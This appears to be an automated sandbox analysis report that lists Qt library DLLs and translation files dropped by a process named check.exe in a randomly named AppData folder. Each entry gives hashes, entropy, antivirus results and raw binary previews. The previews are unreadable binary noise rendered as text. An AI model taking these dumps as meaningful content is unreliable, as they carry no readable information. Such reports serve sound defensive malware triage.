                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gM..#...#...#..~....#.ei&...#.ei'...#.ei ...#..m'...#.ei"...#.(v"...#..m"...#..."...#.(v&...#.(v#...#.(v...#.(v!...#.Rich..#.................PE..d......_.........." .....R...........;....................................................`..........................................m..t...Dn..T.......@....@...=...@..............0...T.......................(.......0............p..(............................text...{Q.......R.................. ..`.rdata..:....p.......V..............@..@.data...H....0......................@....pdata...=...@...>..................@..@.qtmetadz............2..............@..P.rsrc...@............4..............@..@.reloc...............8..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1477104
                                                                                                                                                                                                            Entropy (8bit):6.575113537540671
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:4mCSPJrAbXEEuV9Hw2SoYFo3HdxjEgqJkLdLu5qpmZuhg/A2b:nPlIEEuV9Hw2SFFWHdWZsdmqja/A2b
                                                                                                                                                                                                            MD5:4931FCD0E86C4D4F83128DC74E01EAAD
                                                                                                                                                                                                            SHA1:AC1D0242D36896D4DDA53B95812F11692E87D8DF
                                                                                                                                                                                                            SHA-256:3333BA244C97264E3BD19DB5953EFA80A6E47AACED9D337AC3287EC718162B85
                                                                                                                                                                                                            SHA-512:0396BCCDA43856950AFE4E7B16E0F95D4D48B87473DC90CF029E6DDFD0777E1192C307CFE424EAE6FB61C1B479F0BA1EF1E4269A69C843311A37252CF817D84D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i...-...-...-...$.%.9.....q.,......8......%......)......+...9......9..,......)..........9..8...-..........d......,.....I.,......,...Rich-...........PE..d....._.........." .....,...h......4+..............................................n.....`.............................................x...(...........H............n..........X....r..T...................Pt..(... s..0............@...5...........................text..._+.......,.................. ..`.rdata.......@.......0..............@..@.data....m...@...D...(..............@....pdata...............l..............@..@.qtmetad.............J..............@..P.rsrc...H............L..............@..@.reloc..X............P..............@..B........................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):68592
                                                                                                                                                                                                            Entropy (8bit):6.125954940500008
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:Nt4B1RLj3S6TtH2sweUH+Hz6/4+D6VFsfvUfO:AB1RHFdoeUs6/4O6VFSZ
                                                                                                                                                                                                            MD5:F66F6E9EDA956F72E3BB113407035E61
                                                                                                                                                                                                            SHA1:97328524DA8E82F5F92878F1C0421B38ECEC1E6C
                                                                                                                                                                                                            SHA-256:E23FBC1BEC6CEEDFA9FD305606A460D9CAC5D43A66D19C0DE36E27632FDDD952
                                                                                                                                                                                                            SHA-512:7FF76E83C8D82016AB6BD349F10405F30DEEBE97E8347C6762EB71A40009F9A2978A0D8D0C054CF7A3D2D377563F6A21B97DDEFD50A9AC932D43CC124D7C4918
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o...o...o...f...k......m...{..m......~......h......m......h...o..........k......n.....~.n......n...Richo...........................PE..d...V._.........." .....z...t......T........................................@.......b....`......................................... ................ ..X....................0..4.......T.......................(...p...0...............x............................text....y.......z.................. ..`.rdata...Z.......\...~..............@..@.data...............................@....pdata..............................@..@.qtmetad............................@..P.rsrc...X.... ......................@..@.reloc..4....0......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):144368
                                                                                                                                                                                                            Entropy (8bit):6.294675868932723
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:rrjwZ43rCOtrBk7wcR0l7wBlaL6BtIEt51T0Nhkqg8FoQY:7hZu9R0l7wFBtIEt51T0Nuqg8JY
                                                                                                                                                                                                            MD5:53A85F51054B7D58D8AD7C36975ACB96
                                                                                                                                                                                                            SHA1:893A757CA01472A96FB913D436AA9F8CFB2A297F
                                                                                                                                                                                                            SHA-256:D9B21182952682FE7BA63AF1DF24E23ACE592C35B3F31ECEEF9F0EABEB5881B9
                                                                                                                                                                                                            SHA-512:35957964213B41F1F21B860B03458404FBF11DAF03D102FBEA8C2B2F249050CEFBB348EDC3F22D8ECC3CB8ABFDC44215C2DC9DA029B4F93A7F40197BD0C16960
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R._...1]..1]..1]..]..1]..0\..1]..5\..1]..2\..1]..4\..1]..0\..1]..0\..1]..0]..1]..4\..1]..1\..1]...]..1]..3\..1]Rich..1]........................PE..d...`._.........." .....\...........`.......................................`......wJ....`................................................. ........@..X.... ...............P.........T...................`...(...0...0............p...............................text....Z.......\.................. ..`.rdata......p.......`..............@..@.data...............................@....pdata....... ......................@..@.qtmetadm....0......................@..P.rsrc...X....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):130
                                                                                                                                                                                                            Entropy (8bit):4.024232093209084
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/2/vlAlHekW3/S1MUe3/CLlI+rwtbWlMrNtYs8ar/u:Cwm+/PtUePCRIRt6Ygs8y/u
                                                                                                                                                                                                            MD5:8FF05B56C0995F90A80B7064AA6E915C
                                                                                                                                                                                                            SHA1:D5AEB09AE557CEEFB758972EC4AC624CDDC9E6A7
                                                                                                                                                                                                            SHA-256:A8A1B0D6F958E7366D1C856BE61000106D3E7FC993FB931675369892B9002D0B
                                                                                                                                                                                                            SHA-512:5374E0F1D3F5A6A456B00732DE8005787B17ECEF9C8A2B2C1228966A6A8DE211700334D8FD789DAD269F52D0AEED3F5160010CA60909861E270C253B3EA881A4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ar....R.....q.t.b.a.s.e._.a.r.....q.t.s.c.r.i.p.t._.a.r.....q.t.m.u.l.t.i.m.e.d.i.a._.a.r..............$...*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6813848812976975
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/6lLlAlHekVYtzlY1MUdI7lULlI+rwtbWlMoIFl8IPldkO4t/z:CwDC+7tJjUWhURIRt68f8oiP1z
                                                                                                                                                                                                            MD5:466EED6C184D2055488D4C5EA9AE5F20
                                                                                                                                                                                                            SHA1:8599AB9B731BFC84F6EEC7A0129F396FB8FEC4EA
                                                                                                                                                                                                            SHA-256:9E1CE4D91852352043D9191F1A992838F919CBA7E2F2D9BB1161E494E8BF5F5E
                                                                                                                                                                                                            SHA-512:D2462951EC7DCE3D0851AE9C4ED644FFE0D2A5BDD15B4AE1A4295C187B4295BC854D6A5038DAC0564D165463419D615EB6CE7A9760CEFAD71AB673FB2109C349
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......bg....v.....q.t.b.a.s.e._.b.g.....q.t.s.c.r.i.p.t._.b.g.....q.t.m.u.l.t.i.m.e.d.i.a._.b.g... .q.t.x.m.l.p.a.t.t.e.r.n.s._.b.g.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.631479835393124
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/NVl/lAlHekUOplY1MUce/hlAlI+rwtbWlMpOflUlIPldkOHlz:CwO4+94jUcerAIRt6a6Uloi8
                                                                                                                                                                                                            MD5:6FBA66FE449866B478A2EBA66A724A02
                                                                                                                                                                                                            SHA1:EBEF6ED8460218CE8DF735659A8CBCD693600AC6
                                                                                                                                                                                                            SHA-256:171C7424B24D8502AB53CB3784FF34D8FCFAE26557CF8AF4DFDDEC6485ACC2FE
                                                                                                                                                                                                            SHA-512:2D2438738C6D10D8A53B46DE5A94BBF993818D080F344D9F1B94FC83D60335D9A5E8EFCC297D593FFF1D427972F9F9502FC31C332CAEA579FC7A88487390457E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ca....v.....q.t.b.a.s.e._.c.a.....q.t.s.c.r.i.p.t._.c.a.....q.t.m.u.l.t.i.m.e.d.i.a._.c.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.a.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):157
                                                                                                                                                                                                            Entropy (8bit):3.7483537099309427
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/fVFlAlHekUsplY1MUcM/hlULlI+rwtbWlMpsfl8IPldkO1lPchn:CwY4+9ujUcMrURIRt6aE8oinh
                                                                                                                                                                                                            MD5:D033053C03C3ECFA2AA926E0E674F67F
                                                                                                                                                                                                            SHA1:B4E95F8278121E2549F8BB6B5DAF1496F1738A7D
                                                                                                                                                                                                            SHA-256:3C0CBFD19490D67D1B3B9E944C3A4D9A9E7F87D7AE35E88D5D5A0077349B5B21
                                                                                                                                                                                                            SHA-512:2C7E9E9DBE0B25FBA94A52FE4BCCB1D9FED2A7BD2877DB91F82546C3BC8606280949594227BA0FC1C74C31010E1F573B3A82852BE746EAA4F397140485789136
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......cs....v.....q.t.b.a.s.e._.c.s.....q.t.s.c.r.i.p.t._.c.s.....q.t.m.u.l.t.i.m.e.d.i.a._.c.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.s...........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/4Jlr/lAlHekT6hY1MUb6JAlI+rwtbWlMuel3UlIPldkOQtt:Cw7rC+3jUkAIRt6EVUloi9
                                                                                                                                                                                                            MD5:E6A683F4A0883B5B0C7D30B847EF208C
                                                                                                                                                                                                            SHA1:FF2440DBBFE04AD86C6F285426AAFD49A895B128
                                                                                                                                                                                                            SHA-256:B5036161CE808C728E5FDA985F792DB565831FD01CF00B282547790C037353A2
                                                                                                                                                                                                            SHA-512:D73B794A71DFD3A3C06BF43ED109F635B4960F9A3904FB728873AB5251BDF6A791DDFDEBA884A2703A35461E18BA902804095AC4B92A2C9361526469B6D35FFA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......da....v.....q.t.b.a.s.e._.d.a.....q.t.s.c.r.i.p.t._.d.a.....q.t.m.u.l.t.i.m.e.d.i.a._.d.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.a.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/8rJFlAlHekTul01MUbul4LlI+rwtbWlMuallyIPldkOknt:Cw/rJ4+XU5RIRt6Aaoi7t
                                                                                                                                                                                                            MD5:06168E1261BF72F49F94927723B2E1EB
                                                                                                                                                                                                            SHA1:DEAF1B53C3FEE6CB28840418D0060AFA4D59D3FC
                                                                                                                                                                                                            SHA-256:5805B8FF3747849794E2D70661D737C69C15F1AE763C38E17084B1E5A81E9153
                                                                                                                                                                                                            SHA-512:AA3915C029C74DC270514C7F50E8BEC06C825F278E0DE0477AD8ED3187700BBD7711382A6E47C3AC76AC756CEFF9FA8CDD4E9B9DAC817475BC122F78B02C7D7D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......de....v.....q.t.b.a.s.e._.d.e.....q.t.s.c.r.i.p.t._.d.e.....q.t.m.u.l.t.i.m.e.d.i.a._.d.e... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.e.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6070658648473097
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
                                                                                                                                                                                                            MD5:EE47DFADBA4414FDC051C5CFBE71DDC1
                                                                                                                                                                                                            SHA1:DE650E96A9C130D35F8A498202773EF7FC875D27
                                                                                                                                                                                                            SHA-256:E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
                                                                                                                                                                                                            SHA-512:8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):293121
                                                                                                                                                                                                            Entropy (8bit):5.272179385890926
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
                                                                                                                                                                                                            MD5:F9C3624197ACB30A9E6CC799BB65BED6
                                                                                                                                                                                                            SHA1:D715EAE24387DE15588F68C92991A93FAFB5EEAB
                                                                                                                                                                                                            SHA-256:B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
                                                                                                                                                                                                            SHA-512:199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......faB..I....*...u...+...............@.......A...J...B.......C...X...D.......E.......F...%...G.......H...0...I.......P...v...Q.......R.......S.......T..."...U.......V...h...W.......X...s...Y.......]..e....t...................-.......W.......|.......i...;..Eu...;..Z....;...]...;..c....;.......;..0]...M..f....O.......O..2.......#....}..f=...m..fg.........(5......+;..1a..+;...V..+;...!..+O..17..+O...(..1.......E@......F....u..H4......HY...Y..H....S..I....5..I@.....IA......IC......J...1...J.......J.......J...|...K...6...LD......L.......PS......R....Z..T.......Zr.. ...[`...O..[`......\...%@..\...2..._...&l.._...38..1........E..........2u..........1.......1...........@......4G...........................$...L...$..xY...[.......,...u...y...y...y..z.......F.......<.......g.......5W...........9...........f...E...U...E../....E..................0-...%..6....%.........................3......f..........5...?...0..EK...0......0..L ...0..c....0.......0...Z...5...........Y.. D
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                            Entropy (8bit):3.739162292019161
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
                                                                                                                                                                                                            MD5:72882942B07B8AAC98034016E752B1A0
                                                                                                                                                                                                            SHA1:BF23B4C136B863B10E770019A2DF62FC988859DF
                                                                                                                                                                                                            SHA-256:048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
                                                                                                                                                                                                            SHA-512:403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.680458675741643
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
                                                                                                                                                                                                            MD5:3C45C665CFE036A7474CB4DCBB13CF40
                                                                                                                                                                                                            SHA1:62312DFF3C4CD38BAE8456C981601D0D89600F63
                                                                                                                                                                                                            SHA-256:8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
                                                                                                                                                                                                            SHA-512:21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                            Entropy (8bit):4.463523104731333
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
                                                                                                                                                                                                            MD5:A8D55457C0413893F746D40B637F9C93
                                                                                                                                                                                                            SHA1:25123615482947772176E055E4A74043B2FBCAA0
                                                                                                                                                                                                            SHA-256:49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
                                                                                                                                                                                                            SHA-512:99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):323590
                                                                                                                                                                                                            Entropy (8bit):4.568068046062524
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
                                                                                                                                                                                                            MD5:0661FFABFBC50187F3BA38876B721946
                                                                                                                                                                                                            SHA1:EB5E7205355CFC6BCB4DF27E224079842C97B296
                                                                                                                                                                                                            SHA-256:204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
                                                                                                                                                                                                            SHA-512:65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gl_ESB..I....*.......+..&............@.......A...z...B.......C...p...D.......E......F...!...G......H.......I......P...@...Q.......R......S...5...T......U...+...V.......W...a...X.......Y...N...]..o....t..,................F.......p..............4....;..LI...;..bD...;.......;.......;.......;..cJ...M..o1...O..G....O..e.......U....}..oY...m..o........D..(5...X..+;..6/..+;...~..+;......+O..6...+O...N..1......E@...?..F.......H4..'...HY......H...3`..I......I@......IA......IC..0...J...P...J...1...J...0...J.......K...:...LD..2...L...3...PS..:A..R... d..T.......Zr..Rd..[`......[`.....\...WK..\...RR.._...X..._...f...1........E...{......7M..........1.......1....q......O.......9...............*.......)....$... ...$.......[..,=...,..-....y..0X...y...~......Mx......]0.......H......:A......0....9...............E...o...E..b....E.........1.......c....%..;....%...;......3.......^......S................5..4Z...0..L....0.......0..n....0.......0..7....0.......5..9D......!g.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):83
                                                                                                                                                                                                            Entropy (8bit):3.880645689209568
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
                                                                                                                                                                                                            MD5:DD5C2C6B148F2DB3E666B859776AE129
                                                                                                                                                                                                            SHA1:8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
                                                                                                                                                                                                            SHA-256:C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
                                                                                                                                                                                                            SHA-512:2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8743
                                                                                                                                                                                                            Entropy (8bit):5.189558605179696
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
                                                                                                                                                                                                            MD5:CCD39A7C8139AD041E31B3E5D40968B4
                                                                                                                                                                                                            SHA1:5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
                                                                                                                                                                                                            SHA-256:222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
                                                                                                                                                                                                            SHA-512:9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......arB.....(.....d.0T....*.5w......Uj....!.`.....M.a[............n..t..............39....&................B<s...V..M^...e......4.O5^...r..)^......o>...........?...t.....D ......k.N.....k.N...C...n...T...I...R..........2>.................|..G.......w....T.......l..........,................^............$a......6.>...........x..K......W.b....._Xn......GN...m..~......!.....J.K.H.............pN.............P.~.....o.....W..(.......~......s.>......%c.....o.....R.z.q..........................n.h................e.....i..........:.J.1. .E.3.E.Q.I..........Untitled.....QHelp.....8.*.9.0.Q.1. .F.3... .E.D.A.Q. .'.D.*.Q.,.E.J.9.).:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.......*.9.0.Q.1. .%.F.4.'.!. .'.D./.Q.D.J.D.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....>.*.9.0.Q.1. .%.F.4.'.!. .,./.'.H.D. .A.J. .'.D.E.D.A.Q. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....L.*.9.0.Q.1. .*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10599
                                                                                                                                                                                                            Entropy (8bit):5.192287379770591
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
                                                                                                                                                                                                            MD5:5538049DA3A1D1D724AB6E11D2E2EDBE
                                                                                                                                                                                                            SHA1:7256BE390B88A053C0252488C443BE42F6F2D92A
                                                                                                                                                                                                            SHA-256:CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
                                                                                                                                                                                                            SHA-512:DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
